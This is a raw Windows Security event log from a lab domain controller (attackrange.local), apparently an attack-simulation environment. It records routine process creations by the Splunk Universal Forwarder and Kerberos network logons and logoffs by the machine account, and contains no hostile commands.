Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x4c8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:04:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264328
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1988
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:04:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264330
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x154c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:04:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264331
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1ae8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:04:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264332
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17e0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:04:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264334
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1130
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:04:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264333
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14d0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:04:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264335
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7EE79B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:04:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264338
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7F1FFF
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:04:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264337
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7F1FFF
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62532
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:04:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264336
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7F1FFF
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:05:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264340
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1780
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:05:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264339
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16c0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:05:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264341
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a74
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:05:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264342
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:05:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264343
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18d4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:05:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264345
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:05:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264344
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1aec
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:05:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264348
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7F5991
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:05:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264347
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7F5991
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62545
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:05:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264346
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7F5991
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:06:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264350
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a30
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:06:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264349
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b20
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:06:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264351
Keywords=Audit Success
